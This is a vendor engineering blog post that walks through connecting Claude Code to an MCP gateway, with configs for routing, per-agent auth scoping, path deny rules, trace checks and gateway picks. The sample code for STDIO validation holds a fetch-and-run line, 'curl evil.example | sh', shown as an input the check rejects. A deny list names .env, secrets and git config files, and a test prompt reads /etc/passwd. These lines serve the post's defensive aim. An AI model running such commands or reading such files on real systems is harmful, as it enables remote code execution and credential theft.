Engineering

How to Connect Claude Code to an MCP Gateway in 2026

Wiring Claude Code to an MCP gateway in 2026: mcp.json config, routing rules, per-server auth scoping, verification. Production checklist and gateway picks.

March 5, 2026

11 min read

ai-gateway 2026 claude-code mcp


A Claude Code session with eight MCP servers registered opens eight long-lived connections, pulls every tool description into the model’s inventory, and is one prompt-injection away from invoking filesystem.write with arguments inherited from a poisoned description. Token spend you can see. MCP tool calls you can’t, not without a gateway between client and servers.

This is the implementation walkthrough. For the scored comparison see the sibling listicle. What you get here: four steps that produce a working connection (mcp.json edits, routing rules, per-server auth scoping, verification) plus the production checklist. Written for Claude Code 1.x as of May 2026. Examples use Future AGI Agent Command Center; the shape is identical for the other four gateways at the end.

The problem: what breaks without an MCP gateway in front of Claude Code

Three things break.

Tool calls disappear from observability. Claude Code logs one summary line per MCP invocation. The Anthropic dashboard records nothing about MCP because execution happens client-side. Every failure (a 4-second postgres.query, a filesystem.list that dropped 28K tokens of node_modules into the next turn, a 500 silently retried) is invisible to any production dashboard unless something between client and server captures it.

Each MCP server holds its own credential: API keys for one, OAuth for another, a STDIO process with no auth for the third. The Claude Code process is the keyring. OX Security’s April 15, 2026 disclosure of the STDIO RCE class (arbitrary command execution through process names passed to STDIO, across the official Python, TypeScript, Java, and Rust SDKs) turned centralising credentials from a convenience into a production requirement.

Cost is non-obvious. Every MCP result is re-serialised into the next turn’s input. A tool returning a 12,000-token table adds 12,000 tokens to every subsequent turn for the rest of the session.
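The compounding is easy to put a number on. A minimal sketch, assuming the result is re-sent unchanged on every later turn and that no compaction or cache discount applies; the function name and the 20-turn figure are illustrative, not from any SDK:

```python
def extra_input_tokens(result_tokens: int, remaining_turns: int) -> int:
    """Extra input tokens billed because one tool result stays in context.

    Assumption: the result is re-serialised in full on every later turn,
    with no compaction and no prompt-cache discount.
    """
    return result_tokens * remaining_turns


# A 12,000-token table returned with 20 turns left in the session
# (20 is an illustrative number).
print(extra_input_tokens(12_000, 20))  # 240000
```

One oversized result early in a long session can outweigh every prompt the developer types afterwards.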

A gateway fixes all three. Topology: Claude Code → federation endpoint → registered servers. The gateway parses tools/list and tools/call, attaches span attributes, enforces auth, and forwards.

Prereqs

Claude Code 1.3+. Earlier versions don’t support per-server URL rewrites in mcp.json. Check with claude --version.
An MCP gateway endpoint. Hosted or self-hosted. Walkthrough uses https://gateway.futureagi.com/v1/mcp.
Gateway identity credentials. Future AGI uses FI_API_KEY and FI_SECRET_KEY. Others use the equivalent: Portkey virtual key, Bifrost API key, Kong consumer credentials, agentgateway OAuth client.
Downstream MCP server credentials. Whatever the old mcp.json held directly. Postgres connection string, GitHub PAT, S3 keys. These move to the gateway in step 3.
Network egress to the gateway. If self-hosted in your VPC, confirm the developer laptop can reach it.

Set the environment variables once in your shell profile.

# ~/.zshrc or ~/.bashrc
export FI_API_KEY="fi_live_..."
export FI_SECRET_KEY="..."
export FI_PROJECT="claude-code-prod"
export ANTHROPIC_BASE_URL="https://gateway.futureagi.com/v1/anthropic"

ANTHROPIC_BASE_URL handles the LLM-side gateway hop. It’s separate from the MCP gateway path; the two wire independently. A common mistake is configuring only one side and missing half the traffic.
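A quick way to catch the one-sided setup is to check both hops against the same gateway host. The helper below is a hypothetical pre-flight check, not part of Claude Code or any gateway CLI; it assumes the mcp.json shape used in this walkthrough (an mcpServers map whose entries carry a url).

```python
from urllib.parse import urlparse


def missing_hops(env: dict, mcp_config: dict, gateway_host: str) -> list[str]:
    """Return which hops ("llm", "mcp") do not point at the gateway host."""
    missing = []
    # LLM side: ANTHROPIC_BASE_URL must resolve to the gateway host.
    if urlparse(env.get("ANTHROPIC_BASE_URL", "")).hostname != gateway_host:
        missing.append("llm")
    # MCP side: at least one registered server must use the gateway host.
    servers = mcp_config.get("mcpServers", {}).values()
    if not any(urlparse(s.get("url", "")).hostname == gateway_host for s in servers):
        missing.append("mcp")
    return missing


env = {"ANTHROPIC_BASE_URL": "https://gateway.futureagi.com/v1/anthropic"}
print(missing_hops(env, {"mcpServers": {}}, "gateway.futureagi.com"))  # ['mcp']
```

In practice you would pass os.environ and the parsed contents of mcp.json; an empty list means both sides are wired.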

Architecture overview

Claude Code talks to one federation endpoint; the gateway fans out to each MCP server with the right credential per call.

+-------------------+
|   Claude Code     |
|   (developer      |
|    laptop)        |
+--------+----------+
         |
         |  HTTPS / Streamable HTTP
         |  + OAuth 2.1 bearer (per-agent identity)
         |
         v
+-------------------+
|   MCP Gateway     |  <-- traceAI spans
|   (FAGI ACC,      |      MCP Security scanner
|    Portkey, etc.) |      OAuth 2.1 boundary
+--+----+----+----+-+      per-agent allowlist
   |    |    |    |
   |    |    |    +-------> filesystem MCP server
   |    |    +------------> postgres MCP server
   |    +-----------------> github MCP server
   +----------------------> custom search MCP server

The gateway holds the downstream credentials; Claude Code doesn’t. Each session arrives with a per-agent identity; the gateway rewrites scopes so the search server only sees a search-scoped token, never filesystem writes. Every tool call becomes an OpenTelemetry span keyed by mcp.tool.name, mcp.server.id, user.id, and session.id.

Step 1: register the gateway in Claude Code’s `mcp.json`

Claude Code reads MCP servers from ~/.claude/mcp.json plus a per-project override. The federation pattern is one entry pointing at the gateway; the gateway returns every downstream server through tools/list.

Edit ~/.claude/mcp.json:

{
  "mcpServers": {
    "fagi-gateway": {
      "transport": "streamable-http",
      "url": "https://gateway.futureagi.com/v1/mcp",
      "headers": {
        "Authorization": "Bearer ${FI_API_KEY}",
        "X-FI-Secret": "${FI_SECRET_KEY}",
        "X-FI-Project": "${FI_PROJECT}",
        "X-FI-Agent": "claude-code",
        "X-FI-User": "${USER}@futureagi.com"
      },
      "timeoutMs": 30000
    }
  }
}

Three things matter.

transport: streamable-http is the 2026 default. STDIO is the transport the April 15, 2026 disclosure targeted, so don’t use it across the network. Local STDIO servers (a desktop file picker) get allowlisted server-side after the gateway is wired.

Header substitution with ${VAR}. Claude Code 1.3+ resolves env vars in mcp.json at load time, keeping secrets out of the file. If your team commits mcp.json to the repo, only variable names ship.

X-FI-User and X-FI-Agent. These headers drive per-developer attribution. X-FI-User is the identity claim, usually the SSO email. X-FI-Agent distinguishes Claude Code traffic from Cursor or notebook traffic. Without both, the dashboard collapses to aggregate numbers per project.
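To make the ${VAR} behaviour concrete, here is a minimal sketch of that kind of substitution. It illustrates the semantics described above and is not Claude Code’s actual loader; the function name and the fail-on-unset behaviour are assumptions.

```python
import re

# Matches ${NAME} placeholders such as ${FI_API_KEY}.
_PLACEHOLDER = re.compile(r"\$\{([A-Za-z_][A-Za-z0-9_]*)\}")


def expand_headers(headers: dict[str, str], env: dict[str, str]) -> dict[str, str]:
    """Replace ${VAR} placeholders in header values; fail if a variable is unset."""

    def substitute(match: re.Match) -> str:
        name = match.group(1)
        if name not in env:
            # Assumption: an unset variable should fail loudly rather than
            # send a literal "${FI_API_KEY}" to the gateway.
            raise KeyError(f"environment variable {name} is not set")
        return env[name]

    return {key: _PLACEHOLDER.sub(substitute, value) for key, value in headers.items()}


headers = {"Authorization": "Bearer ${FI_API_KEY}", "X-FI-Agent": "claude-code"}
print(expand_headers(headers, {"FI_API_KEY": "fi_test_123"}))
# {'Authorization': 'Bearer fi_test_123', 'X-FI-Agent': 'claude-code'}
```

Running a check like this in CI against the committed mcp.json catches a missing variable before a developer sees a connection error.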

After saving, restart Claude Code (/quit then re-open). On startup it calls tools/list against the gateway, and the gateway returns the merged inventory across every downstream server. To the agent it looks like one big server with filesystem.read, pg_query, gh_create_issue, etc., all in one namespace.

Common pitfall: if downstream servers were registered directly in mcp.json previously, remove those entries before adding the gateway. Otherwise Claude Code holds two paths to the same tools and the dashboard double-counts.
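Leftover direct entries are easy to spot mechanically. A small sketch, assuming the gateway entry is named fagi-gateway as in the example config; the helper is hypothetical:

```python
def direct_entries(mcp_config: dict, gateway_name: str = "fagi-gateway") -> list[str]:
    """List registered servers other than the gateway entry."""
    servers = mcp_config.get("mcpServers", {})
    return sorted(name for name in servers if name != gateway_name)


config = {"mcpServers": {"fagi-gateway": {}, "postgres": {}, "github": {}}}
print(direct_entries(config))  # ['github', 'postgres']
```

Anything this returns is a second path to a tool the gateway already federates.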

Step 2: configure gateway routing rules

Tell the gateway which downstream MCP servers to federate and how to route tools/call requests. Shape varies by gateway. Future AGI uses YAML, either in the hosted console or in routes.yaml for self-hosted. A three-server federation:

# routes.yaml
mcp:
  federation_id: claude-code-prod
  transport: streamable-http
  servers:
    - name: filesystem
      transport: streamable-http
      url: https://filesystem-mcp.internal.example.com
      tool_prefix: ""
      auth:
        type: bearer
        secret_ref: FILESYSTEM_MCP_TOKEN
      allowlist:
        - filesystem.read
        - filesystem.list
        - filesystem.write
      timeout_ms: 5000

    - name: postgres
      transport: streamable-http
      url: https://postgres-mcp.internal.example.com
      tool_prefix: pg_
      auth:
        type: oauth2_client_credentials
        token_url: https://idp.example.com/oauth/token
        client_id_ref: POSTGRES_MCP_CLIENT_ID
        client_secret_ref: POSTGRES_MCP_CLIENT_SECRET
        scopes: [read]
      allowlist:
        - pg_query
      row_limit: 500
      timeout_ms: 8000

    - name: github
      transport: streamable-http
      url: https://api.github.com/mcp
      tool_prefix: gh_
      auth:
        type: bearer
        secret_ref: GITHUB_PAT
      allowlist:
        - gh_create_issue
        - gh_list_prs
        - gh_get_file
      timeout_ms: 10000

  scanners:
    discovery:
      - prompt_injection
      - tool_poisoning
      - secrets_in_description
    invocation:
      - path_traversal
      - sql_injection
      - command_injection
      - pii_in_arguments

  retries:
    max: 2
    backoff_ms: 250
    on_status: [502, 503, 504]

  rate_limits:
    per_user_per_minute: 120
    per_session_per_minute: 600

Four things to call out.

tool_prefix prevents namespace collisions when two servers expose a query or a list. Postgres query becomes pg_query.

allowlist stops the agent from invoking tools you forgot were registered. Start narrow, audit for a week, expand. Don’t use allow_all: true “just to test”; that’s the setting most teams forget to tighten before prod.

row_limit on pg_query is the kind of per-server guardrail that doesn’t exist in vanilla MCP. The gateway truncates oversized result sets, preventing a 50,000-row table from blowing the next turn’s context. In our usage, this single rule cuts Claude Code input-token spend by about 8% week-over-week.

scanners run at both discovery and invocation. At discovery, the gateway scans the tool description text the model will see; this is where tool poisoning lives. At invocation, it scans arguments, where path traversal, SQL injection, and command injection live. The Future AGI Protect model family runs inline at 65 ms text / 107 ms image median time-to-label per arXiv 2510.13351. Protect is FAGI’s own set of fine-tuned Gemma 3n adapters covering content moderation, bias detection, security/prompt-injection, and data privacy/PII, multi-modal across text, image, and audio: a model family rather than a plugin chain. Error Feed sits alongside as FAGI’s part of the eval stack, the clustering and what-to-fix layer that feeds the self-improving evaluators. It uses HDBSCAN clustering plus a Sonnet 4.5 Judge that writes immediate_fix, auto-clustering related scanner-blocked or argument-validation failures into named issues (50 traces → 1 issue), each with an auto-written root cause, quick fix, and long-term recommendation.
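For the tool_prefix and allowlist keys, the merge the gateway performs at tools/list can be pictured as follows. This is a sketch of the idea under stated assumptions, not the gateway’s implementation: the drop_table and delete_repo tools are hypothetical, and the dictionary shape simply mirrors routes.yaml.

```python
def merged_inventory(servers: list[dict]) -> list[str]:
    """Prefix each server's tools, then keep only allowlisted names."""
    merged: list[str] = []
    for server in servers:
        allowed = set(server["allowlist"])
        for tool in server["tools"]:
            name = server["tool_prefix"] + tool
            # Tools the server exposes but the allowlist omits never
            # reach the model's inventory.
            if name in allowed:
                merged.append(name)
    return merged


servers = [
    {"tool_prefix": "pg_", "tools": ["query", "drop_table"],
     "allowlist": ["pg_query"]},
    {"tool_prefix": "gh_", "tools": ["create_issue", "list_prs", "delete_repo"],
     "allowlist": ["gh_create_issue", "gh_list_prs"]},
]
print(merged_inventory(servers))  # ['pg_query', 'gh_create_issue', 'gh_list_prs']
```

The prefix is applied before the allowlist check, which is why the allowlist entries in routes.yaml use the prefixed names.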

After saving, reload (fagi gateway reload for self-hosted; automatic for hosted). The next tools/list reflects the new inventory.

Step 3: wire auth scoping per MCP server

Step 2 declared which credential each downstream server uses. Step 3 makes sure those credentials never widen the agent’s effective scope.

The pattern: the developer’s per-agent identity is the only credential that crosses the laptop boundary. The gateway holds every downstream secret. When it calls a downstream server, it presents a credential scoped to exactly the operations the per-agent identity is allowed to perform. The agent never sees the downstream credential.

Three concrete cases.

Case 1. Wide bearer token (filesystem). The filesystem MCP token grants read-write to the entire mounted volume. You don’t want every Claude Code session to inherit “delete anything.” Use per-agent allowlist plus path scoping:

- name: filesystem
  auth:
    type: bearer
    secret_ref: FILESYSTEM_MCP_TOKEN
  per_agent_scope:
    "claude-code":
      allowlist: [filesystem.read, filesystem.list, filesystem.write]
      path_prefix: /workspace/
      deny_paths:
        - /workspace/secrets/
        - /workspace/.env
        - /workspace/.git/config

The downstream server still receives a wide token; the gateway enforces the narrow scope before forwarding. If Claude Code calls filesystem.write on /workspace/.env, the gateway returns a structured error and never touches the server.
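The path check itself is simple, but it has to normalise before comparing or a ../ segment walks straight out of the prefix. A minimal sketch of such a check, assuming POSIX paths and that relative paths resolve against path_prefix; it does not resolve symlinks, and it is not the gateway’s actual code:

```python
import posixpath


def path_allowed(path: str, prefix: str, deny_paths: list[str]) -> bool:
    """Return True if the normalised path is under prefix and not denied."""
    # Resolve relative paths against the prefix, then collapse ".." so
    # "/workspace/../etc/passwd" cannot slip past the prefix check.
    normalised = posixpath.normpath(posixpath.join(prefix, path))
    root = prefix.rstrip("/")
    if normalised != root and not normalised.startswith(root + "/"):
        return False
    for denied in deny_paths:
        target = denied.rstrip("/")
        # Deny the exact path and anything beneath it.
        if normalised == target or normalised.startswith(target + "/"):
            return False
    return True


deny = ["/workspace/secrets/", "/workspace/.env", "/workspace/.git/config"]
print(path_allowed("package.json", "/workspace/", deny))              # True
print(path_allowed("/workspace/.env", "/workspace/", deny))           # False
print(path_allowed("/workspace/../etc/passwd", "/workspace/", deny))  # False
```

Comparing on whole path segments matters: a plain string-prefix test against /workspace/.env would also block an unrelated file such as /workspace/.envrc.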

Case 2. OAuth 2.1 client credentials with downscoping (Postgres). The IdP supports scope claims. The gateway requests a token with only the scopes the per-agent identity is allowed to use:

- name: postgres
  auth:
    type: oauth2_client_credentials
    token_url: https://idp.example.com/oauth/token
    client_id_ref: POSTGRES_MCP_CLIENT_ID
    client_secret_ref: POSTGRES_MCP_CLIENT_SECRET
    scopes: [read]
  per_agent_scope:
    "claude-code":
      allowlist: [pg_query]
      scope_override: [read]
      schema_allowlist: [public, analytics]

The gateway’s token could be issued with [read, write, admin]. The per-agent override clamps to [read] before the call. Claude Code can’t escalate.
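The clamp is an intersection: the agent ends up with the scopes that are both issued and permitted by the override, never more. A sketch with a hypothetical helper name:

```python
def clamp_scopes(issued: list[str], override: list[str]) -> list[str]:
    """Keep only the issued scopes that the per-agent override also permits."""
    permitted = set(override)
    return [scope for scope in issued if scope in permitted]


print(clamp_scopes(["read", "write", "admin"], ["read"]))  # ['read']
```

Because the result is always a subset of the override, widening the gateway’s own token later does not widen what Claude Code can do.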

Case 3. STDIO with sanitization (local-only). If you must use STDIO for a local server, run the sanitizer on process invocation:

- name: local_desktop
  transport: stdio
  command: /usr/local/bin/desktop-mcp
  args: ["--readonly"]
  sanitize_stdio: true
  per_agent_scope:
    "claude-code":
      allowlist: [desktop.list_apps]

sanitize_stdio: true blocks the April 15, 2026 RCE class by validating that command and args exactly match the config. Claude Code can’t spawn arbitrary processes through tool arguments.
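The exact-match rule can be sketched in a few lines. This illustrates the validation described above under the assumption that the full argv must equal the configured command plus args; how the gateway implements sanitize_stdio internally is not documented here.

```python
def spawn_allowed(requested_argv: list[str], command: str, args: list[str]) -> bool:
    """Allow a spawn only if argv exactly matches the configured command and args."""
    return requested_argv == [command, *args]


configured = ("/usr/local/bin/desktop-mcp", ["--readonly"])
print(spawn_allowed(["/usr/local/bin/desktop-mcp", "--readonly"], *configured))  # True
print(spawn_allowed(["/bin/sh", "-c", "curl evil.example | sh"], *configured))   # False
```

Exact equality is deliberately stricter than a prefix or allowlist match: an extra trailing argument is rejected too.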

Audit-mode tip: run with enforce: false for a week before enforcing. The audit log surfaces legitimate calls an over-tight policy would block. Then flip enforce: true. Skipping this is how a Friday deploy breaks half the developers Monday morning.
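The difference between audit and enforce mode comes down to one branch. A sketch of the decision, where the would_block label is a hypothetical name for the audit-log verdict:

```python
def decide(policy_allows: bool, enforce: bool) -> tuple[bool, str]:
    """Return (forward_call, audit_label) for one tool call."""
    if policy_allows:
        return True, "pass"
    if enforce:
        return False, "blocked"
    # Audit mode: forward the call anyway, but record what enforcement
    # would have done so over-tight rules show up in the log.
    return True, "would_block"


print(decide(policy_allows=False, enforce=False))  # (True, 'would_block')
print(decide(policy_allows=False, enforce=True))   # (False, 'blocked')
```

A week of would_block entries is the list of rules to loosen, or calls to question, before flipping the flag.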

Step 4: verify tool calls are traced

Three checks. Run them in order.

Check 1, gateway sees the connection. From the Claude Code CLI:

$ claude
> /mcp list

Expect one entry, fagi-gateway, with status connected and merged tools including filesystem.read, pg_query, gh_create_issue. A status of error is almost always a missing or expired FI_API_KEY.

Check 2, tool call produces a span. Trigger an MCP call:

> read the package.json in this repo

Claude Code invokes filesystem.read. In the Agent Command Center dashboard, the session appears under “Recent traces” within seconds. The tree:

session_id: abc123
└── anthropic.messages.create  (model: claude-opus-4-7)
    └── mcp.tool.call  (tool: filesystem.read, server: filesystem)
        duration: 142ms
        attributes:
          mcp.tool.name: filesystem.read
          mcp.server.id: filesystem
          mcp.arguments: {"path": "package.json"}
          user.id: nikhil@futureagi.com
          fi.scanner.verdict: pass

If the model call is there but the MCP child span is missing, the gateway intercepted LLM traffic but not tool traffic. Re-check mcp.json: transport must be streamable-http.

Check 3, failures are captured. Trigger one on purpose:

> read the file at /etc/passwd

The path is outside /workspace/, so the gateway returns 403 and the span records fi.scanner.verdict: blocked. Claude Code surfaces a tool error and the agent recovers. The blocked call appears in the audit log with the full argument payload.

If all three pass, the gateway is wired. Every MCP call now produces spans you can slice by tool, server, user, session, verdict.

Production checklist

Six operational concerns that bite in production.

| Concern | What to check |
| --- | --- |
| Latency overhead | Measure the p50 and p95 gateway hop. Per arXiv 2510.13351, Protect adds a 65 ms median for text scanning and a 107 ms median for image scanning. End-to-end MCP call latency should stay under ~250ms p95 for in-region gateway deployments; flag anything over 400ms. |
| Failure isolation | What happens if the gateway is down? Set Claude Code’s `timeoutMs` to fail fast (30s) and provide a documented fallback flow (“re-enable direct MCP for read-only servers under incident”). Do not silently fall back without auditing. |
| Cost attribution | Confirm `X-FI-User` and `X-FI-Agent` are populated on every request. Spot-check the dashboard: group-by-user should show every developer, not “unknown” buckets. |
| Audit log retention | Where do `blocked` and `error` spans live? For SOC 2, you want 90 days minimum; for HIPAA-adjacent workloads, 6 years. Configure span export to your long-term store, not just the live dashboard. |
| Cold start after deploy | The first call after a gateway restart will be 200-400ms slower while connection pools warm up. If your CI runs Claude Code on every PR, this matters; pre-warm the gateway with a synthetic `tools/list` call as part of the deploy script. |
| Rollback in 60 seconds | Have a procedure to disable the gateway hop in one command. For Future AGI, that is `unset ANTHROPIC_BASE_URL; mv ~/.claude/mcp.json ~/.claude/mcp.json.gateway; cp ~/.claude/mcp.json.direct ~/.claude/mcp.json`. Keep the direct-connection `mcp.json` checked in so you can restore in under a minute if the gateway has a bad day. |

Tool-call success rate is the headline metric. Without a gateway, teams typically see 88-91% (timeouts, transient 5xx, arg-format issues). With a gateway plus retries and per-server timeouts, the same teams climb to 96-98%. Track it; roll back any config change that drops the number below baseline.
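Computing the metric from exported spans takes a few lines. A sketch, assuming each tool-call span has been reduced to a status string where "ok" means success; the status values and function names are illustrative, not a traceAI schema:

```python
def success_rate(statuses: list[str]) -> float:
    """Fraction of tool-call spans whose status is "ok"."""
    if not statuses:
        raise ValueError("no spans to score")
    return sum(1 for status in statuses if status == "ok") / len(statuses)


def should_roll_back(current: float, baseline: float) -> bool:
    """Flag a config change that pushed the success rate below baseline."""
    return current < baseline


spans = ["ok"] * 97 + ["timeout"] * 2 + ["error"]
rate = success_rate(spans)
print(f"{rate:.2%}", should_roll_back(rate, baseline=0.96))  # 97.00% False
```

Scoring a fixed window (say, the last day of spans) before and after each config change gives the baseline comparison the rollback rule needs.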

Brief gateway picks

Five gateways that implement the federation pattern. The walkthrough works against any with small changes to header names and routing-config syntax. For the scored comparison see the sibling listicle.

Future AGI Agent Command Center. Apache 2.0 traceAI plus hosted Agent Command Center. Only entry piping MCP spans into fi.evals and agent-opt for a self-improving loop, with dedicated MCP Security scanner inline at 65 ms text median time-to-label per arXiv 2510.13351.

Maxim Bifrost. Apache 2.0 Go binary doing LLM gateway plus MCP federation in one process. Vendor benchmark ~11µs P50 at 5K RPS (gateway overhead, not end-to-end). Pick when raw throughput is the binding constraint.

Portkey. Hosted with the most polished UI, virtual keys, mature RBAC. The April 30, 2026 Palo Alto Networks acquisition merges the roadmap into Prisma AIRS; verify multi-year continuity before signing.

Kong AI Gateway. Right pick if you already run Kong. AI Proxy plus OAuth plugins extend the existing stack. Plan two weeks of platform-team time for the MCP dashboard.

agentgateway.dev. Linux Foundation-hosted, Apache 2.0, vendor-neutral. Pick when governance is the binding constraint. Dashboard is thinner; pair with your own Grafana stack.

Where this fits in the FAGI loop

The walkthrough above is a one-time configuration. To make it self-improving, wire fi.evals to score every MCP span on tool-call accuracy and task-completion, then feed low-score traces into agent-opt. The agent-opt library is Apache 2.0 and ships six optimizers (ProTeGi, BayesianSearchOptimizer with Optuna, GEPAOptimizer, MetaPromptOptimizer, RandomSearchOptimizer, PromptWizardOptimizer), all sharing EarlyStoppingConfig. A typical Claude Code rewrite drops 14 of 38 registered tools that the agent never invokes; each costs ~180 input tokens per session at discovery. Net effect across a team running 22 sessions a day: input-token spend trends down 12-18% in four weeks, and the tool-call failure rate drops from ~12% to 3-4%, with no developer behaviour change.
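The discovery-side saving from pruning unused tools follows directly from those figures. A worked sketch (the function name is illustrative, and this counts only tool-description tokens at discovery, not the wider 12-18% effect):

```python
def discovery_tokens_saved(tools_dropped: int, tokens_per_tool: int,
                           sessions_per_day: int) -> int:
    """Input tokens no longer spent on unused tool descriptions per day."""
    return tools_dropped * tokens_per_tool * sessions_per_day


# 14 dropped tools x ~180 tokens each = 2,520 tokens per session;
# across 22 sessions a day that is 55,440 tokens.
print(discovery_tokens_saved(14, 180, 22))  # 55440
```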

Apache 2.0 building blocks: traceAI, fi.evals, agent-opt at github.com/future-agi. Hosted Agent Command Center adds failure-cluster views, Protect guardrails, MCP Security scanner, RBAC, SOC 2 Type II, HIPAA BAA, AWS Marketplace.

Sources

Anthropic Claude Code MCP documentation, claude.ai/docs/claude-code/mcp
Model Context Protocol specification 2025-11-25, modelcontextprotocol.io/specification/2025-11-25
OX Security advisory on MCP STDIO RCE class (April 15, 2026), ox.security/blog/mcp-supply-chain-advisory-rce-vulnerabilities-across-the-ai-ecosystem
Future AGI Agent Command Center docs, docs.futureagi.com/docs/command-center
Future AGI Protect latency benchmarks, arxiv.org/abs/2510.13351 (65 ms text / 107 ms image median time-to-label)
Future AGI traceAI, github.com/future-agi/traceAI (Apache 2.0)
Future AGI agent-opt, github.com/future-agi/agent-opt (Apache 2.0)
Maxim Bifrost benchmarks, getmaxim.ai/bifrost/resources/benchmarks
Portkey AI gateway, portkey.ai
Kong AI Gateway, konghq.com/products/kong-ai-gateway
agentgateway.dev, agentgateway.dev (Linux Foundation project page)

Frequently asked questions

Do I have to use the Future AGI MCP gateway, or can I use a generic OSS one?

The walkthrough works against any of the five named above. Generic OSS choices include agentgateway.dev and Maxim Bifrost. You give up the evaluation-and-optimization loop and the named MCP Security scanner; you keep federation, per-agent OAuth 2.1, and OTel emission.

How do I roll back if the gateway breaks something?

Keep `~/.claude/mcp.json.direct` with the previous direct-server entries checked in. Rolling back is `unset ANTHROPIC_BASE_URL; cp ~/.claude/mcp.json.direct ~/.claude/mcp.json` plus a Claude Code restart. Under a minute. Practice once before you need it.

How much latency does the gateway add?

Protect inline scanning: 65 ms text median time-to-label per arXiv 2510.13351. An end-to-end MCP call typically lands at 150-250ms p95 for in-region deployments. Over 400ms usually means a misconfigured downstream timeout or scanners running on payloads they should skip.

Is it safe to run this in production?

Yes, with the production checklist and an audit-mode rollout for the per-agent allowlist. The most common incident is over-tight allowlists blocking legitimate calls; audit-mode catches those before they hit developers.

What about MCP servers that only support STDIO?

Allowlist per agent with `sanitize_stdio: true` so the gateway validates the command-and-args envelope before spawning. Do not use STDIO across the network; the April 15, 2026 RCE class targeted the STDIO transport. For network MCP, always use Streamable HTTP.

